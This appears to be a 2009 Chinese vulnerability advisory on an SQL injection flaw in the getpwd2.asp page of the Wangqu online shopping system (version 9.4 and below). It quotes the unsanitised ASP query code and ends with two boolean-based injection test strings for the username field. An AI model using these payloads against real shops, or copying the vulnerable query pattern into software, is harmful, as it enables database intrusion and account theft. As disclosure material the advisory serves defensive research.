网趣网上购物系统getpwd2.asp注入漏洞
来源:岁月联盟
时间:2009-08-23
9.4及以下版本漏洞描述:
网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。
漏洞页面:getpwd2.asp
漏洞代码:
<%
username=request.form("username")
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username=’"&username&"’ "
rs.open sql,conn,1,1
If rs.eof Then
%>
典型的注入<*参考
http://hi.baidu.com/cnryan/blog/item/7073f1d5119361cd50da4beb.html
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!test’ and 1=1 and ’’=’
test’ and 1=2 and ’’=’
